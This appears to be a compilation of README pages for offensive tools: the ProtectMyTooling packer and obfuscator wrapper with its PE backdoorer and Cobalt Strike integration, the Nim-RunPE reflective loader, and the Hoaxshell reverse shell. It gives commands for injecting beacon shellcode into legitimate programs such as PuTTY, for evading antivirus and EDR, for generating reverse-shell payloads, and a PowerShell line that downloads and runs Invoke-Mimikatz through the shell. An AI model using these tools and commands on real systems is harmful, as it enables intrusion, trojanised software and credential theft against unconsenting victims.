  2. AsStrongAsFuck - A console obfuscator for .NET assemblies by Charterino
  3. CallObfuscator - Obfuscates specific windows apis with different apis.
  4. ConfuserEx - Popular .NET obfuscator, forked from Martin Karing
  5. Donut - Popular PE loader that takes EXE/DLL/.NET on input and produces a PIC shellcode
  6. Enigma - A powerful system designed for comprehensive protection of executable files
  7. Hyperion - runtime encrypter for 32-bit and 64-bit portable executables. It is a reference implementation and bases on the paper "Hyperion: Implementation of a PE-Crypter"
  8. IntelliLock - combines strong license security, highly adaptable licensing functionality/schema with reliable assembly protection
  9. InvObf - Obfuscates Powershell scripts with Invoke-Obfuscation (by Daniell Bohannon)
  10. LoGiC.NET - A more advanced free and open .NET obfuscator using dnlib by AnErrupTion
  11. Mangle - Takes input EXE/DLL file and produces output one with cloned certificate, removed Golang-specific IoCs and bloated size. By Matt Eidelberg (@Tyl0us).
  12. MPRESS - MPRESS compressor by Vitaly Evseenko. Takes input EXE/DLL/.NET/MAC-DARWIN (x86/x64) and compresses it.
  13. NetReactor - Unmatched .NET code protection system which completely stops anyone from decompiling your code
  14. NetShrink - an exe packer aka executable compressor, application password protector and virtual DLL binder for Windows & Linux .NET applications.
  15. Nimcrypt2 - Generates Nim loader running input .NET, PE or Raw Shellcode. Authored by (@icyguider)
  16. NimPackt-v1 - Takes Shellcode or .NET Executable on input, produces EXE or DLL loader. Brought to you by Cas van Cooten (@chvancooten)
  17. NimSyscallPacker - Takes PE/Shellcode/.NET executable and generates robust Nim+Syscalls EXE/DLL loader. Sponsorware authored by (@S3cur3Th1sSh1t)
  18. Packer64 - wrapper around John Adams' Packer64
  19. pe2shc - Converts PE into a shellcode. By yours truly @hasherezade
  20. peCloak - A Multi-Pass Encoder & Heuristic Sandbox Bypass AV Evasion Tool
  21. peresed - Uses "peresed" from avast/pe_tools to remove all existing PE Resources and signature (think of Mimikatz icon).
  22. ScareCrow - EDR-evasive x64 shellcode loader that produces DLL/CPL/XLL/JScript/HTA artifact loader
  23. sgn - Shikata ga nai (ไป•ๆ–นใŒใชใ„) encoder ported into go with several improvements. Takes shellcode, produces encoded shellcode
  24. SmartAssembly - obfuscator that helps protect your application against reverse-engineering or modification, by making it difficult for a third-party to access your source code
  25. sRDI - Convert DLLs to position independent shellcode. Authored by: Nick Landers, @monoxgas
  26. Themida - Advanced Windows software protection system
  27. UPX - a free, portable, extendable, high-performance executable packer for several executable formats.
  28. VMProtect - protects code by executing it on a virtual machine with non-standard architecture that makes it extremely difficult to analyze and crack the software

You can quickly list supported packers using -L option (table columns are chosen depending on Terminal width, the wider the more information revealed):

C:\> py -L

Red Team implants protection swiss knife.

Multi-Packer wrapping around multitude of packers, protectors, shellcode loaders, encoders.
Mariusz Banach / mgeeky '20-'22, <>

| # | Name | Type | Licensing | Input | Output | Author |
| 1 | amber | open-source | Shellcode Loader | PE | EXE, Shellcode | Ege B alci |
| 2 | asstrongasfuck | open-source | .NET Obfuscator | .NET | .NET | Charterino, klezVirus |
| 3 | backdoor | open-source | Shellcode Loader | Shellcode | PE | Mariusz Banach, @mariuszbit |
| 4 | callobf | open-source | PE EXE/DLL Protector | PE | PE | Mustafa Mahmoud, @d35ha |
| 5 | confuserex | open-source | .NET Obfuscator | .NET | .NET | mkaring |
| 6 | donut-packer | open-source | Shellcode Converter | PE, .NET, VBScript, JScript | Shellcode | TheWover |
| 7 | enigma | commercial | PE EXE/DLL Protector | PE | PE | The Enigma Protector Developers Team |
| 8 | hyperion | open-source | PE EXE/DLL Protector | PE | PE | nullsecurity team |
| 9 | intellilock | commercial | .NET Obfuscator | PE | PE | Eziriz |
| 10 | invobf | open-source | Powershell Obfuscator | Powershell | Powershell | Daniel Bohannon |
| 11 | logicnet | open-source | .NET Obfuscator | .NET | .NET | AnErrupTion, klezVirus |
| 12 | mangle | open-source | Executable Signing | PE | PE | Matt Eidelberg (@Tyl0us) |
| 13 | mpress | freeware | PE EXE/DLL Compressor | PE | PE | Vitaly Evseenko |
| 14 | netreactor | commercial | .NET Obfuscator | .NET | .NET | Eziriz |
| 15 | netshrink | open-source | .NET Obfuscator | .NET | .NET | Bartosz Wรณjcik |
| 16 | nimcrypt2 | open-source | Shellcode Loader | PE, .NET, Shellcode | PE | @icyguider |
| 17 | nimpackt | open-source | Shellcode Loader | .NET, Shellcode | PE | Cas van Cooten (@chvancooten) |
| 18 | nimsyscall | sponsorware | Shellcode Loader | PE, .NET, Shellcode | PE | @S3cur3Th1sSh1t |
| 19 | packer64 | open-source | PE EXE/DLL Compressor | PE | PE | John Adams, @jadams |
| 20 | pe2shc | open-source | Shellcode Converter | PE | Shellcode | @hasherezade |
| 21 | pecloak | open-source | PE EXE/DLL Protector | PE | PE | Mike Czumak, @SecuritySift, buherator / v-p-b |
| 22 | peresed | open-source | PE EXE/DLL Protector | PE | PE | Martin Vejnรกr, Avast |
| 23 | scarecrow | open-source | Shellcode Loader | Shellcode | DLL, JScript, CPL, XLL | Matt Eidelberg (@Tyl0us) |
| 24 | sgn | open -source | Shellcode Encoder | Shellcode | Shellcode | Ege Balci |
| 25 | smartassembly | commercial | .NET Obfuscator | .NET | .NET | Red-Gate |
| 26 | srdi | open-source | Shellcode Encoder | DLL | Shellcode | Nick Landers, @monoxgas |
| 27 | themida | commercial | PE EXE/DLL Protector | PE | PE | Oreans |
| 28 | upx | open-source | PE EXE/DLL Compressor | PE | PE | Markus F.X.J. Oberhumer, Lรกszlรณ Molnรกr, John F. Reiser |
| 29 | vmprotect | commercial | PE EXE/DLL Protector | PE | PE | vmpsoft |

Above are the packers that are supported, but that doesn't mean that you have them configured and ready to use. To prepare their usage, you must first supply necessary binaries to the contrib directory and then configure your YAML file accordingly.

RedWatermarker - built-in Artifact watermarking

Artifact watermarking & IOC collection

This program is intended for professional Red Teams and is perfect to be used in a typical implant-development CI/CD pipeline. As a red teamer I'm always expected to deliver decent quality list of IOCs matching back to all of my implants as well as I find it essential to watermark all my implants for bookkeeping, attribution and traceability purposes.

To accommodate these requirements, ProtectMyTooling brings basic support for them.

Artifact Watermarking

ProtectMyTooling can apply watermarks after obfuscation rounds simply by using --watermark option.:

py ProtectMyTooling [...] -w dos-stub=fooooobar -w checksum=0xaabbccdd -w section=.coco,ALLYOURBASEAREBELONG

There is also a standalone approach, included in script.

It takes executable artifact on input and accepts few parameters denoting where to inject a watermark and what value shall be inserted.

Example run will set PE Checksum to 0xAABBCCDD, inserts foooobar to PE file's DOS Stub (bytes containing This program cannot be run...), appends bazbazbaz to file's overlay and then create a new PE section named .coco append it to the end of file and fill that section with preset marker.

py beacon-obf.exe -c 0xaabbccdd -t fooooobar -e bazbazbaz -s .coco,ALLYOURBASEAREBELONG

Full watermarker usage:

cmd> py --help

j. f#iE###G.
EW, .E#t E#fD#W;
E##j i#W, E#t t##L
E###D. L#D. E#t .E#K,
E#jG#W; :K#Wfff; E#t j##f
E#t t##f i##WLLLLtE#t :E#K:
E#t :K#E: .E#L E#t t##L
E#KDDDD###i f#E: E#t .D#W; ,; G: ,;
E#f,t#Wi,,, ,WW; E#tiW#G. f#i j. j. E#, : f#i j.
E#t ;#W: ; .D#;E#K##i .. GEEEEEEEL .E#t EW, .. : .. EW, E#t .GE .E#t EW,
DWi ,K.DL ttE##D. ;W, ,;;L#K;;. i#W, E##j ,W, .Et ;W, E##j E#t j#K; i#W, E##j
f. :K#L LWL E#t j##, t#E L#D. E###D. t##, ,W#t j##, E###D. E#GK#f L#D. E###D.
EW: ;W##L .E#f L: G###, t#E :K#Wfff; E#jG#W; L###, j###t G###, E#jG#W; E##D. :K#Wfff; E#jG#W;
E#t t#KE#L ,W#; :E####, t#E i##WLLLLt E#t t##f .E#j##, G#fE#t :E####, E#t t##f E##Wi i##WLLLLt E#t t##f
E#t f#D.L#L t#K: ;W#DG##, t#E .E#L E#t :K#E: ;WW; ##,:K#i E#t ;W#DG##, E#t :K#E:E#jL#D: .E#L E#t :K#E:
E#jG#f L#LL#G j###DW##, t#E f#E: E#KDDDD###i j#E. ##f#W, E#t j###DW##, E#KDDDD###E#t ,K#j f#E: E#KDDDD###i
E###; L###j G##i,,G##, t#E ,WW; E#f,t#Wi,,,.D#L ###K: E#t G##i,,G##, E#f,t#Wi,,E#t jD ,WW; E#f,t#Wi,,,
E#K: L#W; :K#K: L##, t#E .D#; E#t ;#W: :K#t ##D. E#t :K#K: L##, E#t ;#W: j#t .D#; E#t ;#W:
EG LE. ;##D. L##, fE tt DWi ,KK:... #G .. ;##D. L##, DWi ,KK: ,; tt DWi ,KK:
; ;@ ,,, .,, : j ,,, .,,

Watermark thy implants, track them in VirusTotal
Mariusz Banach / mgeeky '22, (@mariuszbit)

usage: [options] <infile>

-h, --help show this help message and exit

Required arguments:
infile Input implant file

Optional arguments:
-C, --check Do not actually inject watermark. Check input file if it contains specified watermarks.
-v, --verbose Verbose mode.
-d, --debug Debug mode.
-o PATH, --outfile PATH
Path where to save output file with watermark injected. If not given, will modify infile.

PE Executables Watermarking:
-t STR, --dos-stub STR
Insert watermark into PE DOS Stub (Th is program cannot be run...).
-c NUM, --checksum NUM
Preset PE checksum with this value (4 bytes). Must be number. Can start with 0x for hex value.
-e STR, --overlay STR
Append watermark to the file's Overlay (at the end of the file).
-s NAME,STR, --section NAME,STR
Append a new PE section named NAME and insert watermark there. Section name must be shorter than 8 characters. Section will be marked Read-Only, non-executable.

Currently only PE files watermarking is supported, but in the future Office documents and other formats are to be added as well.

IOCs Collection

IOCs may be collected by simply using -i option in ProtectMyTooling run.

They're being collected at the following phases:

  • on the input file
  • after each obfuscation round on an intermediary file
  • on the final output file

They will contain following fields saved in form of a CSV file:

  • timestamp
  • filename
  • author - formed as username@hostname
  • context - whether a record points to an input, output or intermediary file
  • comment - value adjusted by the user through -I value option
  • md5
  • sha1
  • sha256
  • imphash - PE Imports Hash, if available
  • (TODO) typeref_hash - .NET TypeRef Hash, if available

Resulting will be a CSV file named outfile-ioc.csv stored side by side to generated output artifact. That file is written in APPEND mode, meaning it will receive all subsequent IOCs.

RedBackdoorer - built-in PE Backdooring

ProtectMyTooling utilizes my own script which provides few methods for backdooring PE executables. Support comes as a dedicated packer named backdoor. Example usage:

Takes Cobalt Strike shellcode on input and encodes with SGN (Shikata Ga-Nai) then backdoors SysInternals DbgView64.exe then produces Amber EXE reflective loader

PS> py sgn,backdoor,amber beacon64.bin dbgview64-infected.exe -B dbgview64.exe

::::::::::.:::::::.. ... :::::::::::.,:::::: .,-::::::::::::::::
`;;;```.;;;;;;``;;;; .;;;;;;;;;;;;;;;;;;;,;;;'````;;;;;;;;
`]]nnn]]' [[[,/[[[' ,[[ \[[, [[ [[cccc [[[ [[
$$$"" $$$$$$c $$$, $$$ $$ $$"""" $$$ $$
888o 888b "88bo"888,_ _,88P 88, 888oo,_`88bo,__,o, 88,
;;,. ;;;';;. ;;;;'
[[[[, ,[[[[, '[[,[[['
$$$$$$$$"$$$ c$$"
888 Y88" 888o,8P"`
::::::::::::mM... ... ::: :::::. :::. .,-:::::/
;;;;;;;;.;;;;;;;. .;;;;;;;. ;;; ;;`;;;;, `;;,;;-'````'
[[ ,[[ \[[,[[ \[[,[[[ [[[ [[[[[. '[[[[ [[[[[[/
$$ $$$, $$$$$, $$$$$' $$$ $$$ "Y$c$"$$c. "$$
88, "888,_ _,88"888,_ _,88o88oo,._888 888 Y88`Y8bo,,,o88o

Red Team implants protection swiss knife.

Multi-Packer wrapping around multitude of packers, protectors, shellcode loaders, encoders.
Mariusz Banach / mgeeky '20-'22, <>

[.] Processing x64 file : beacon64.bin
[>] Generating output of sgn(<file>)...
[>] Generating output of backdoor(sgn(<file>))...
[>] Generating output of Amber(backdoor(sgn(<file>)))...

[+] SUCCEEDED. Original file size: 265959 bytes, new file size Amber(backdoor(sgn(<file>))): 1372672, ratio: 516.12%

Full RedBackdoorer usage:

cmd> py --help

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Your finest PE backdooring companion.
Mariusz Banach / mgeeky '22, (@mariuszbit)

usage: [options] <mode> <shellcode> <infile>

-h, --help show this help message and exit

Required arguments:
mode PE Injection mode, see help epilog for more details.
shellcode Input shellcode file
infile PE file to backdoor

Optional arguments:
-o PATH, --outfil e PATH
Path where to save output file with watermark injected. If not given, will modify infile.
-v, --verbose Verbose mode.

Backdooring options:
-n NAME, --section-name NAME
If shellcode is to be injected into a new PE section, define that section name. Section name must not be longer than 7 characters. Default: .qcsw
-i IOC, --ioc IOC Append IOC watermark to injected shellcode to facilitate implant tracking.

Authenticode signature options:
-r, --remove-signature
Remove PE Authenticode digital signature since its going to be invalidated anyway.


PE Backdooring <mode> consists of two comma-separated options.
First one denotes where to store shellcode, second how to run it:


| |
| +---------- 1 - change AddressOfEntryPoint
| 2 - hijack branching instruction at Original Entry Point (jmp, call, ...)
| 3 - setup TLS callback
+-------------- 1 - store shellcode in the middle of a code section
2 - append shellcode to the PE file in a new PE section

py 1,2 beacon.bin putty.exe putty-infected.exe

Cobalt Strike Integration

There is also a script that integrates used as a wrapper around configured PE/.NET Packers/Protectors in order to easily transform input executables into their protected and compressed output forms and then upload or use them from within CobaltStrike.

The idea is to have an automated process of protecting all of the uploaded binaries or .NET assemblies used by execute-assembly and forget about protecting or obfuscating them manually before each usage. The added benefit of an automated approach to transform executables is the ability to have the same executable protected each time it's used, resulting in unique samples launched on target machines. That should nicely deceive EDR/AV enterprise-wide IOC sweeps while looking for the same artefact on different machines.

Additionally, the protected-execute-assembly command has the ability to look for assemblies of which only name were given in a preconfigured assemblies directory (set in dotnet_assemblies_directory setting).

To use it:

  1. Load CobaltStrike/ProtectMyTooling.cna in your Cobalt Strike.
  2. Go to the menu and setup all the options

  1. Then in your Beacon's console you'll have following commands available:
  • protected-execute-assembly - Executes a local, previously protected and compressed .NET program in-memory on target.
  • protected-upload - Takes an input file, protects it if its PE executable and then uploads that file to specified remote location.

Basically these commands will open input files, pass the firstly to the CobaltStrike/ script, which in turn calls out to As soon as the binary gets obfuscated, it will be passed to your beacon for execution/uploading.

Cobalt Strike related Options

Here's a list of options required by the Cobalt Strike integrator:

  • python3_interpreter_path - Specify a path to Python3 interpreter executable
  • protect_my_tooling_dir - Specify a path to ProtectMyTooling main directory
  • protect_my_tooling_config - Specify a path to ProtectMyTooling configuration file with various packers options
  • dotnet_assemblies_directory - Specify local path .NET assemblies should be looked for if not found by execute-assembly
  • cache_protected_executables - Enable to cache already protected executables and reuse them when needed
  • protected_executables_cache_dir - Specify a path to a directory that should store cached protected executables
  • default_exe_x86_packers_chain - Native x86 EXE executables protectors/packers chain
  • default_exe_x64_packers_chain - Native x64 EXE executables protectors/packers chain
  • default_dll_x86_packers_chain - Native x86 DLL executables protectors/packers chain
  • default_dll_x64_packers_chain - Native x64 DLL executables protectors/packers chain
  • default_dotnet_packers_chain - .NET executables protectors/packers chain

Known Issues

  • ScareCrow is very tricky to run from Windows. What worked for me is following:
    1. Run on Windows 10 and have WSL installed (bash.exe command available in Windows)
    2. Have golang installed in WSL at version 1.16+ (tested on 1.18)
    3. Make sure to have PackerScareCrow.Run_ScareCrow_On_Windows_As_WSL = True set

Credits due & used technology

  • All packer, obfuscator, converter, loader credits goes to their authors. This tool is merely a wrapper around their technology!

    • Hopefully none of them mind me adding such wrappers. Should there be concerns - please reach out to me.
  • ProtectMyTooling also uses denim.exe by moloch-- by some Nim-based packers.


  • Write custom PE injector and offer it as a "protector"
  • Add watermarking to other file formats such as Office documents, WSH scripts (VBS, JS, HTA) and containers
  • Add support for a few other Packers/Loaders/Generators in upcoming future:


Use of this tool as well as any other projects I'm author of for illegal purposes, unsolicited hacking, cyber-espionage is strictly prohibited. This and other tools I distribute help professional Penetration Testers, Security Consultants, Security Engineers and other security personnel in improving their customer networks cyber-defence capabilities.
In no event shall the authors or copyright holders be liable for any claim, damages or other liability arising from illegal use of this software.

If there are concerns, copyright issues, threats posed by this software or other inquiries - I am open to collaborate in responsibly addressing them.

The tool exposes handy interface for using mostly open-source or commercially available packers/protectors/obfuscation software, therefore not introducing any immediately new threats to the cyber-security landscape as is.

โ˜•Show Supportโ˜•

This and other projects are outcome of sleepless nights and plenty of hard work. If you like what I do and appreciate that I always give back to the community, Consider buying me a coffee (or better a beer) just to say thank you!



   Mariusz Banach / mgeeky, '20-'22
<mb [at]>

Nim-RunPE - A Nim Implementation Of Reflective PE-Loading From Memory

A Nim implementation of reflective PE-Loading from memory. The base for this code was taken from RunPE-In-Memory - which I ported to Nim.

You'll need to install the following dependencies:

nimble install ptr_math winim

I did test this with Nim Version 1.6.2 only, so use that version for testing or I cannot guarantee no errors when using another version.


If you want to pass arguments on runtime or don't want to pass arguments at all compile via:

nim c NimRunPE.nim

If you want to hardcode custom arguments modify const exeArgs to your needs and compile with:

nim c -d:args NimRunPE.nim - this was contributed by @glynx, thanks!


More Information

The technique itself it pretty old, but I didn't find a Nim implementation yet. So this has changed now. :)

If you plan to load e.g. Mimikatz with this technique - make sure to compile a version from source on your own, as the release binaries don't accept arguments after being loaded reflectively by this loader. Why? I really don't know it's strange but a fact. If you compile on your own it will still work:


My private Packer is also weaponized with this technique - but all Win32 functions are replaced with Syscalls there. That makes the technique stealthier.

Hoaxshell - An Unconventional Windows Reverse Shell, Currently Undetected By Microsoft Defender And Various Other AV Solutions, Solely Based On Http(S) Traffic

hoaxshell is an unconventional Windows reverse shell, currently undetected by Microsoft Defender and possibly other AV solutions as it is solely based on http(s) traffic. The tool is easy to use, it generates it's own PowerShell payload and it supports encryption (ssl).

So far, it has been tested on fully updated Windows 11 Enterprise and Windows 10 Pro boxes (see video and screenshots).

Video Presentation


Find more screenshots here.


git clone
cd ./hoaxshell
sudo pip3 install -r requirements.txt
chmod +x


Basic shell session over http

sudo python3 -s <your_ip>

When you run hoaxshell, it will generate its own PowerShell payload for you to copy and inject on the victim. By default, the payload is base64 encoded for convenience. If you need the payload raw, execute the "rawpayload" prompt command or start hoaxshell with the -r argument. After the payload has been executed on the victim, you'll be able to run PowerShell commands against it.

Encrypted shell session (https):

# Generate self-signed certificate:
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365

# Pass the cert.pem and key.pem as arguments:
sudo python3 -s <your_ip> -c </path/to/cert.pem> -k <path/to/key.pem>

The generated PowerShell payload will be longer in length because of an additional block of code that disables the ssl certificate validation.

Grab session mode

In case you close your terminal accidentally, have a power outage or something, you can start hoaxshell in grab session mode, it will attempt to re-establish a session, given that the payload is still running on the victim machine.

sudo python3 -s <your_ip> -g

Important: Make sure to start hoaxshell with the same settings as the session you are trying to restore (http/https, port, etc).


The shell is going to hang if you execute a command that initiates an interactive session. Example:

# this command will execute succesfully and you will have no problem: 
> powershell echo 'This is a test'

# But this one will open an interactive session within the hoaxshell session and is going to cause the shell to hang:
> powershell

# In the same manner, you won't have a problem executing this:
> cmd /c dir /a

# But this will cause your hoaxshell to hang:
> cmd.exe

So, if you for example would like to run mimikatz throught hoaxshell you would need to invoke the commands:

hoaxshell > IEX(New-Object Net.WebClient).DownloadString('');Invoke-Mimikatz -Command '"PRIVILEGE::Debug"'

Long story short, you have to be careful to not run an exe or cmd that starts an interactive session within the hoaxshell powershell context.


I am currently working on some auxiliary-type prompt commands to automate parts of host enumeration.
